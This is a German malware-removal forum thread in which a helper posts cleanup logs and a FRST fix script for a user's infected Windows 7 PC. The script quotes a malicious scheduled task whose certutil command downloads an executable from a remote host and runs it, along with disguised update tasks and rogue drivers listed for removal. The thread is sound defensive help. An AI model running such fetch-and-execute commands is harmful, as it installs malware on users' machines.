WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
         
AdwCleaner
Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 7.1.1.0
# -------------------------------
# Build:    04-27-2018
# Database: 2018-05-30.1
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    05-31-2018
# Duration: 00:00:02
# OS:       Windows 7 Ultimate
# Cleaned:  83
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\Users\Nico\AppData\Local\betterworld
Deleted       C:\Users\Nico\AppData\Roaming\FastDataX
Deleted       C:\Users\Nico\AppData\Roaming\FLV and Media Player
Deleted       C:\Windows\Syswow64\SSL
Deleted       C:\Users\Nico\AppData\Roaming\PARETOLOGIC
Deleted       C:\Windows\Temp\Smartbar
Deleted       C:\Windows\rss

***** [ Files ] *****

Deleted       C:\Windows\System32\mcicda64.dll
Deleted       C:\Users\Nico\AppData\Roaming\Mozilla\Firefox\Profiles\xub00lap.default\searchplugins\yahoo! powered.xml
Deleted       C:\Users\Nico\AppData\Roaming\Mozilla\Firefox\Profiles\xub00lap.default\invalidprefs.js
Deleted       C:\Users\Nico\appdata\local\installationconfiguration.xml
Deleted       C:\Users\Nico\AppData\Local\Main.dat
Deleted       C:\Windows\Temp\reimage.log
Deleted       C:\Windows\Reimage.ini
Deleted       C:\Windows\SysWOW64\findit.xml
Deleted       C:\Windows\System32\drivers\Winmon.sys
Deleted       C:\Windows\System32\drivers\WinmonFS.sys
Deleted       C:\Windows\System32\drivers\WinmonProcessMonitor.sys

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Deleted       C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\ScheduledUpdate
Deleted       C:\Windows\System32\Tasks\ReimageUpdater
Deleted       C:\Windows\System32\Tasks\WindowsRecoveryCleaner

***** [ Registry ] *****

Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted       HKLM\Software\Wow6432Node\mtSubair
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Subair.exe
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted       HKLM\Software\Wow6432Node\Classes\CLSID\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted       HKLM\Software\Classes\CLSID\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted       HKCU\Software\Microsoft\BigTime
Deleted       HKU\S-1-5-18\Software\ByteFence
Deleted       HKU\.DEFAULT\Software\ByteFence
Deleted       HKLM\Software\Wow6432Node\RegisteredApplications|FLV and Media Player
Deleted       HKLM\SOFTWARE\RegisteredApplications|FLV and Media Player
Deleted       HKCU\Software\FastDataX
Deleted       HKCU\Software\EpicNet Inc.
Deleted       HKCU\Software\csastats
Deleted       HKLM\Software\Microsoft\DMunversion
Deleted       HKCU\Software\CoinisRevShare
Deleted       HKCU\Software\ParetoLogic
Deleted       HKLM\Software\Wow6432Node\ParetoLogic
Deleted       HKCU\Software\WebDiscoverBrowser
Deleted       HKLM\Software\Wow6432Node\WebDiscoverBrowser
Deleted       HKLM\Software\WebDiscoverBrowser
Deleted       HKLM\Software\Wow6432Node\Classes\AppID\REI_AxControl.DLL
Deleted       HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Deleted       HKLM\Software\Wow6432Node\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted       HKLM\Software\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted       HKLM\Software\Wow6432Node\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted       HKLM\Software\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted       HKLM\Software\Wow6432Node\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted       HKLM\Software\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted       HKLM\Software\Wow6432Node\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted       HKLM\Software\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted       HKLM\Software\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted       HKLM\Software\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted       HKLM\System\CurrentControlSet\Services\EventLog\Application\Application Hosting
Deleted       HKCU\Software\PRODUCTSETUP
Deleted       HKCU\Software\Reimage
Deleted       HKLM\Software\Reimage
Deleted       HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater
Deleted       HKCU\Environment|SNP
Deleted       HKCU\Environment|SNF
Deleted       HKCU\Software\System Healer
Deleted       HKCU\Software\MICROSOFT\wewewe
Deleted       HKLM\Software\Wow6432Node\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
Deleted       HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
Deleted       HKCU\Software\Microsoft\{cc6eb6d8-85b7-435p-8b86-51e4d16ea76d}
Deleted       HKLM\Software\Microsoft\PrIncub
Deleted       HKLM\Software\Microsoft\MPrForShutT
Deleted       HKLM\Software\Microsoft\PrAmNP
Deleted       HKLM\Software\Microsoft\NSaveA
Deleted       HKLM\Software\Microsoft\APreSam
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{5b0c3e0d-0e9b-4ebd-a5de-222a48f16015}
Deleted       HKCU\Software\WidModule
Deleted       HKLM\Software\texttotalk
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsRecoveryCleaner

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete IFEO
[+] Delete Prefetch
[+] Delete Tracing Keys
[+] Reset BITS
[+] Reset Windows Firewall
[+] Reset Chromium Policies
[+] Reset IE Policies
[+] Reset Proxy Settings
[+] Reset Winsock

*************************


########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
         

Alt 31.05.2018, 21:30   #13
M-K-D-B
/// TB-Ausbilder
 
trojaner?/virus? - Standard

trojaner?/virus?



Servus,


du hast dreimal die fixlog.txt gepostet...

Es fehlt die eine Logdatei von FRST (FRST.txt), bitte in Code-Box nachreichen.

Dann kann es weitergehen.

Danke!
__________________
Gruß
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterstützen

Geändert von M-K-D-B (31.05.2018 um 23:26 Uhr)

Alt 01.06.2018, 09:57   #14
moinbro
 
trojaner?/virus? - Standard

trojaner?/virus?



Sorry

ist zu groß für die Code-Box
Angehängte Dateien
Dateityp: zip FRST.zip (22,5 KB, 4x aufgerufen)

Alt 01.06.2018, 10:26   #15
M-K-D-B
/// TB-Ausbilder
 
trojaner?/virus? - Standard

trojaner?/virus?



Servus,




bitte bis auf Weiteres nichts mehr installieren oder deinstallieren!

Der erste FRST-Fix lief nicht durch, daher versuchen wir es jetzt so:




Schritt 1
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
    HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
    C:\Program Files\SystemaRev
    S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
    C:\ProgramData\Microsoft\Windows\WNetworkMgmt
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
    S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
    C:\Windows\System32\drivers\WinmonProcessMonitor.sys
    C:\Windows\System32\drivers\WinmonFS.sys
    C:\Windows\System32\drivers\Winmon.sys
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
    2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
    2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
    2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
    2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
    2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
    2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
    2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
    2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
    2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
    2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
    2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
    2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
    2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
    2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
    2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
    2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
    2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
    2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
    2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
    2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
    2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
    ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
    C:\Windows\system32\mcicda64.dll
    Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
    C:\Program Files\Social Software
    Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
    C:\Program Files\SystemaRev
    Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
    Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
    Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
    C:\Program Files (x86)\nodejs
    Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
    Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
    Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
    Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
    Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
    Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
    Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
    C:\Program Files\Reimage
    Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
    C:\ProgramData\Iostream.exe
    ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [552]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
    AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
    Unlock: C:\Windows\system32\Drivers\etc\hosts
    C:\Windows\system32\Drivers\etc\hosts
    Hosts:
    VirusTotal: C:\Windows\system32\ntkrnlmp.exe
    VirusTotal: C:\Windows\system32\osloader.exe
    VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
    CMD: dir "%ProgramFiles%"
    CMD: dir "%ProgramFiles(x86)%"
    CMD: dir "%ProgramData%"
    CMD: dir "%Appdata%"
    CMD: dir "%LocalAppdata%"
    CMD: dir "%CommonProgramFiles(x86)%"
    CMD: dir "%CommonProgramW6432%"
    CMD: dir "%UserProfile%"
    CMD: dir "C:\"
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    RemoveProxy:
    CMD: ipconfig /flushdns
    cmd: netsh winsock reset catalog
    cmd: netsh advfirewall reset
    cmd: netsh advfirewall set allprofiles state ON
    cmd: Bitsadmin /Reset /Allusers
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.






Bitte poste mit deiner nächsten Antwort
  • die Logdatei des FRST-Fix (fixlog.txt),
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).
__________________
Gruß
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterstützen

Antwort

Themen zu trojaner?/virus?
100 % auslastung, cpu 100% auslastung, firefox, internet explorer, trojaner



Ähnliche Themen: trojaner?/virus?


  1. DHL Trojaner-Virus
    Log-Analyse und Auswertung - 16.06.2015 (3)
  2. Werbung-Virus, Virus, Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 25.12.2014 (1)
  3. W 8.1,Trojaner kann von mir nicht entfernt werden.Virus: Trojan.GenericKD.1673711 (Engine A),Virus: Win32.Trojan.Pirpi.A (Engine B)
    Plagegeister aller Art und deren Bekämpfung - 21.08.2014 (3)
  4. GVU Trojaner / Virus?
    Plagegeister aller Art und deren Bekämpfung - 06.02.2014 (11)
  5. Virus/Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 25.12.2013 (1)
  6. Pop Up Virus/Trojaner?
    Log-Analyse und Auswertung - 13.07.2013 (15)
  7. Nach Virus/Trojaner-Befall nun "sauber"? (GEMA Virus)
    Plagegeister aller Art und deren Bekämpfung - 05.09.2012 (17)
  8. BKA Trojaner (Virus?)
    Log-Analyse und Auswertung - 30.08.2012 (5)
  9. Windows 7 (64bit) Virus/Trojaner (evtl. Windows Verschlüsselungs Trojaner)
    Plagegeister aller Art und deren Bekämpfung - 07.05.2012 (19)
  10. AVG Anti Virus free meldet Virus PSW.Generic7.BWMP, Virus läßt sich nicht beseitigen
    Plagegeister aller Art und deren Bekämpfung - 30.10.2010 (21)
  11. Virus/Trojaner
    Log-Analyse und Auswertung - 23.02.2010 (13)
  12. virus remover 2008 = Virus oder trojaner
    Plagegeister aller Art und deren Bekämpfung - 01.01.2009 (4)
  13. Virus/Trojaner?
    Mülltonne - 17.11.2008 (0)
  14. virus,trojaner ?
    Log-Analyse und Auswertung - 29.05.2008 (5)
  15. Probleme mit Virus, Trojaner: networm-i.virus@fp, PSW.x-Vir trojan, ...@ms
    Log-Analyse und Auswertung - 07.08.2007 (11)
  16. ICQ Virus/Trojaner
    Diskussionsforum - 25.12.2006 (13)
  17. Virus Trojaner
    Log-Analyse und Auswertung - 17.09.2006 (4)

Zum Thema trojaner?/virus? - Vorgeschichte: Ich habe mir diverse mods für GTA SA heruntergeladen und dazu auch diverse mod installer und IMG editoren. Bei den Dateien die ich mir runtergeladen habe war wohl eine - trojaner?/virus?...
Archiv
Du betrachtest: trojaner?/virus? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.